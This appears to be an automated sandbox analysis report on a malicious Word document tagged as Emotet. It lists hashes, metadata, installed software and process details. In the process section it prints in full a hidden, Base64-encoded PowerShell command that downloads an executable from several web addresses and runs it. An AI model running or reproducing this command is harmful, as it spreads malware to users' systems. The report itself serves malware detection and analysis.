Program did not start
General Info
- File name
-
f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3
- Verdict
- Malicious activity
- Threats:
-
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.
- Analysis date
- 12/2/2019, 21:19:33
- OS:
- Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
- Tags:
-
macros
macros-on-open
maldoc-4
generated-doc
emotet-doc
emotet
- Indicators:
- No indicators
- MIME:
- application/msword
- File info:
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Vel consequuntur dicta., Author: Ole Dietrich, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 20 12:50:00 2019, Last Saved Time/Date: Wed Nov 20 12:50:00 2019, Number of Pages: 1, Number of Words: 20, Number of Characters: 117, Security: 0
- MD5
-
8a14986e256a03c1d24b219777a774bd
- SHA1
-
968ce452b29b67a976b5467d54bb8c1167dea4d4
- SHA256
-
f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3
- SSDEEP
-
1536:Q6DT5VlMeOY5C6OJsdBpZWCRI6VHzGC2+ra/AmYv1zGuCAKfIYkt6ZW7ngxrtN:hDT5VCeOY5CTsdACdij+sjYNzDi7
Software environment set and analysis options
Launch configuration
- Task duration
- 60 seconds
- Additional time used
- none
- Fakenet option
- off
- Heavy Evaision option
- off
- MITM proxy
- off
- Route via Tor
- off
- Network geolocation
- off
- Privacy
- Public submission
- Autoconfirmation of UAC
- on
Software preset
- Internet Explorer 8.0.7601.17514
- Adobe Acrobat Reader DC MUI (15.023.20070)
- Adobe Flash Player 26 ActiveX (26.0.0.131)
- Adobe Flash Player 26 NPAPI (26.0.0.131)
- Adobe Flash Player 26 PPAPI (26.0.0.131)
- Adobe Refresh Manager (1.8.0)
- CCleaner (5.35)
- FileZilla Client 3.36.0 (3.36.0)
- Google Chrome (75.0.3770.100)
- Google Update Helper (1.3.34.7)
- Java 8 Update 92 (8.0.920.14)
- Java Auto Updater (2.8.92.14)
- Microsoft .NET Framework 4.7.2 (4.7.03062)
- Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
- Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
- Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
- Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
- Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
- Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
- Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
- Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
- Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
- Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Professional 2010 (14.0.6029.1000)
- Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
- Microsoft Office Proof (English) 2010 (14.0.6029.1000)
- Microsoft Office Proof (French) 2010 (14.0.6029.1000)
- Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
- Microsoft Office Proof (German) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
- Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
- Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office Single Image 2010 (14.0.6029.1000)
- Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
- Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
- Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
- Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
- Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
- Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
- Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
- Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
- Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
- Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
- Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
- Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
- Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
- Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
- Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
- Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
- Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
- Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
- Notepad++ (32-bit x86) (7.5.1)
- Opera 12.15 (12.15.1748)
- Skype version 8.29 (8.29)
- Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
- VLC media player (2.2.6)
- WinRAR 5.60 (32-bit) (5.60.0)
Hotfixes
- Client LanguagePack Package
- Client Refresh LanguagePack Package
- CodecPack Basic Package
- Foundation Package
- IE Troubleshooters Package
- InternetExplorer Optional Package
- KB2534111
- KB2999226
- KB4019990
- KB976902
- LocalPack AU Package
- LocalPack CA Package
- LocalPack GB Package
- LocalPack US Package
- LocalPack ZA Package
- ProfessionalEdition
- UltimateEdition
Behavior activities
| MALICIOUS | SUSPICIOUS | INFO |
|---|---|---|
|
No malicious indicators. |
Creates files in the user directory
|
Creates files in the user directory
|
Static information
TRiD
.doc
|
Microsoft Word document (54.2%)
.doc
|
Microsoft Word document (old ver.) (32.2%)
EXIF
FlashPix
Title:
Vel consequuntur dicta.
Subject:
null
Author:
Ole Dietrich
Keywords:
null
Comments:
null
Template:
Normal.dotm
LastModifiedBy:
null
RevisionNumber:
1
Software:
Microsoft Office Word
TotalEditTime:
null
CreateDate:
2019:11:20 12:50:00
ModifyDate:
2019:11:20 12:50:00
Pages:
1
Words:
20
Characters:
117
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
Lines:
1
Paragraphs:
1
CharCountWithSpaces:
136
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
null
HeadingPairs
null
null
CompObjUserTypeLen:
25
CompObjUserType:
Microsoft Forms 2.0 Form
Screenshots
Processes
Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
1
Behavior graph
–
+
Specs description
Integrity level
elevation
Task сontains an error
or was rebooted
Process has crashed
Task contains several
apps running
Executable file was
dropped
Debug information is
available
Process was injected
Network attacks were
detected
Application downloaded
the executable file
Actions similar to
stealing personal data
Behavior similar to
exploiting the vulnerability
Inspected object has
sucpicious PE structure
File is detected by
antivirus software
CPU overrun
RAM overrun
Process starts the
services
Process was added to
the startup
Behavior similar to
spam
Low-level access to
the HDD
Probably Tor was used
System was rebooted
Connects to the
network
Known threat
Process information
Click at the process to see the details.
- PID
- 688
- CMD
- "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3.doc"
- Path
- C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
- Indicators
- No indicators
- Parent process
- ––
- User
- admin
- Integrity Level
- MEDIUM
- Version:
- Company
- Microsoft Corporation
- Description
- Microsoft Word
- Version
- 14.0.6024.1000
Modules
| Image |
|---|
| c:\program files\microsoft office\office14\winword.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\system32\advapi32.dll |
| c:\windows\system32\msvcrt.dll |
| c:\windows\system32\sechost.dll |
| c:\windows\system32\rpcrt4.dll |
| c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll |
| c:\windows\system32\lpk.dll |
| c:\windows\system32\usp10.dll |
| c:\windows\system32\msctf.dll |
| c:\windows\system32\ole32.dll |
| c:\program files\microsoft office\office14\gfx.dll |
| c:\program files\microsoft office\office14\oart.dll |
| c:\windows\system32\msi.dll |
| c:\windows\system32\apphelp.dll |
| c:\program files\common files\microsoft shared\office14\cultures\office.odf |
| c:\program files\microsoft office\office14\1033\wwintl.dll |
| c:\program files\common files\microsoft shared\office14\1033\msointl.dll |
| c:\program files\common files\microsoft shared\office14\msores.dll |
| c:\program files\common files\microsoft shared\office14\msptls.dll |
| c:\windows\system32\uxtheme.dll |
| c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll |
| c:\windows\system32\version.dll |
| c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll |
| c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll |
| c:\windows\system32\powrprof.dll |
| c:\windows\system32\devobj.dll |
| c:\windows\system32\clbcatq.dll |
| c:\windows\system32\setupapi.dll |
| c:\windows\system32\propsys.dll |
| c:\windows\system32\ntmarta.dll |
| c:\windows\system32\rsaenh.dll |
| c:\windows\system32\msxml6.dll |
| c:\windows\system32\sxs.dll |
| c:\progra~1\micros~1\office14\genko.dll |
| c:\windows\system32\wininet.dll |
| c:\windows\system32\msasn1.dll |
| c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll |
| c:\program files\microsoft office\office14\gkword.dll |
| c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll |
| c:\windows\system32\fontsub.dll |
| c:\program files\common files\microsoft shared\office14\mso.dll |
| c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll |
| c:\windows\system32\fm20.dll |
| c:\windows\system32\comdlg32.dll |
| c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll |
| c:\windows\system32\shdocvw.dll |
| c:\windows\system32\fm20enu.dll |
| c:\windows\system32\wbemcomn.dll |
| c:\windows\system32\wbem\wbemprox.dll |
| c:\windows\system32\wbem\wmiutils.dll |
| c:\windows\system32\kernelbase.dll |
| c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll |
| c:\windows\system32\user32.dll |
| c:\windows\system32\gdi32.dll |
| c:\windows\system32\imm32.dll |
| c:\program files\microsoft office\office14\wwlib.dll |
| c:\windows\system32\oleaut32.dll |
| c:\windows\system32\wtsapi32.dll |
| c:\windows\system32\msimg32.dll |
| c:\windows\system32\shlwapi.dll |
| c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll |
| c:\windows\system32\cryptbase.dll |
| c:\windows\system32\dwmapi.dll |
| c:\program files\common files\microsoft shared\office14\riched20.dll |
| c:\windows\system32\mscoree.dll |
| c:\windows\system32\winspool.drv |
| c:\windows\system32\shell32.dll |
| c:\windows\system32\cfgmgr32.dll |
| c:\windows\system32\wldap32.dll |
| c:\windows\system32\cryptsp.dll |
| c:\windows\system32\rpcrtremote.dll |
| c:\windows\system32\profapi.dll |
| c:\windows\system32\urlmon.dll |
| c:\windows\system32\iertutil.dll |
| c:\windows\system32\crypt32.dll |
| c:\windows\system32\sspicli.dll |
| c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll |
| c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll |
| c:\program files\common files\microsoft shared\office14\usp10.dll |
| c:\windows\system32\wbem\wbemdisp.dll |
| c:\windows\system32\ws2_32.dll |
| c:\windows\system32\nsi.dll |
| c:\windows\system32\wbem\wbemsvc.dll |
| c:\windows\system32\wbem\fastprox.dll |
| c:\windows\system32\ntdsapi.dll |
| c:\windows\system32\windowscodecs.dll |
- PID
- 1036
- CMD
- powershell -w hidden -enco JABDAHoAZwBqAGEAeQBlAHMAdABzAHEAdAB4AD0AJwBaAGoAbQB1AGQAZgBmAGkAcwAnADsAJABEAGYAawB6AG4AYQBmAGEAaQBkAHgAegBtACAAPQAgACcANgA2ADgAJwA7ACQATQBjAHIAeQBlAGwAagBmAGcAdgBlAD0AJwBaAG4AcQBoAHgAZwBpAHYAZQBlAG8AbgBzACcAOwAkAFYAZgBvAHkAcgBvAGcAaABnAGMAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABmAGsAegBuAGEAZgBhAGkAZAB4AHoAbQArACcALgBlAHgAZQAnADsAJABXAHEAbgByAGIAbAByAHEAYwB1AGwAaQA9ACcAWABkAGUAbAB4AGUAcwBwACcAOwAkAE8AdABmAHQAbgBjAGwAaQBzAGkAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAE4ARQB0AC4AdwBFAGIAYwBMAEkAZQBOAFQAOwAkAEYAbgB6AHkAaQBxAGgAaQA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAbAAuAHUAZwBtAHUAegBpAGsALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGkAZABjADgAaQBkAHcALQBhADQAegA4AGEAdQAtADYANwA2ADMANQA4AC8AKgBoAHQAdABwAHMAOgAvAC8AYQB3AGEAbAAxADIAMgAxADgAMgAuADAAMAAwAHcAZQBiAGgAbwBzAHQAYQBwAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGIANwA3AGMAYQB3ADYAMAAtAGsAaABuAC0ANwA5ADgAOAA1ADgANAAvACoAaAB0AHQAcABzADoALwAvAHoAeQBsAG8AawBrAC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFIARgBoAEwAdABvAEYALwAqAGgAdAB0AHAAcwA6AC8ALwByAGEAYwBpAG4AZwB0AHUAcgB0AGwAZQBzAGcAMAA3AC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwA3ADMAMwBxAGIAZgBpAHEAYQAtAGgAawBkADgAMwA1AHoAeQAtADEAMQA5ADkALwAqAGgAdAB0AHAAOgAvAC8AaQBkAGUAYQBsAG4AZQB3AGgAbwBtAGUAcwAuAGMAbwBtAC8AcwBlAGkAdABlAF8AMwAvAHAAMwBqAGsANgB1AGwAMAB5AC0AYQBhAGQAMQB3AC0ANQA3ADcANgA4ADAANwA3AC8AJwAuACIAcwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAEsAcQBzAGkAeABkAGwAbQBsAHIAaQBwAD0AJwBaAGwAaAB3AG4AbQBsAHkAdAB1ACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGIAdwBuAHEAaABsAHEAaQBmAHIAIABpAG4AIAAkAEYAbgB6AHkAaQBxAGgAaQApAHsAdAByAHkAewAkAE8AdABmAHQAbgBjAGwAaQBzAGkALgAiAEQATwB3AE4AYABsAG8AYABBAEQAZgBpAEwAZQAiACgAJABLAGIAdwBuAHEAaABsAHEAaQBmAHIALAAgACQAVgBmAG8AeQByAG8AZwBoAGcAYwBuACkAOwAkAEoAYgB1AHYAegBoAHAAcgA9ACcAUwBqAHMAegBqAHoAdwB4AHMAaQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFYAZgBvAHkAcgBvAGcAaABnAGMAbgApAC4AIgBMAGUATgBgAEcAdABIACIAIAAtAGcAZQAgADMANgA0ADYAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABWAGYAbwB5AHIAbwBnAGgAZwBjAG4AKQA7ACQATAB3AHcAYgBvAGsAbAB4AHgAYwA9ACcASgByAHEAcwBhAGEAcQBmAG8AcwB5AGQAJwA7AGIAcgBlAGEAawA7ACQATQBiAHcAYwB4AGYAcgBvAD0AJwBDAGcAYQBoAHYAbgB2AGcAdgBmAHoAaABnACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAZQBtAHkAcwB4AHMAbQBrAHgAawA9ACcARQBzAGMAdgBpAHIAcAB1AHoAaQBrAGIAJwA=
- Path
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- Indicators
- Parent process
- ––
- User
- admin
- Integrity Level
- MEDIUM
- Exit code
- 0
- Version:
- Company
- Microsoft Corporation
- Description
- Windows PowerShell
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
| Image |
|---|
| c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\system32\advapi32.dll |
| c:\windows\system32\sechost.dll |
| c:\windows\system32\atl.dll |
| c:\windows\system32\mscoree.dll |
| c:\windows\system32\imm32.dll |
| c:\windows\system32\profapi.dll |
| c:\windows\system32\cfgmgr32.dll |
| c:\windows\system32\devobj.dll |
| c:\windows\system32\apphelp.dll |
| c:\windows\system32\shdocvw.dll |
| c:\windows\system32\linkinfo.dll |
| c:\windows\system32\ntshrui.dll |
| c:\windows\system32\srvcli.dll |
| c:\windows\system32\cscapi.dll |
| c:\windows\system32\slc.dll |
| c:\windows\system32\cryptsp.dll |
| c:\windows\system32\rsaenh.dll |
| c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll |
| c:\windows\system32\version.dll |
| c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll |
| c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll |
| c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll |
| c:\windows\system32\psapi.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll |
| c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll |
| c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll |
| c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll |
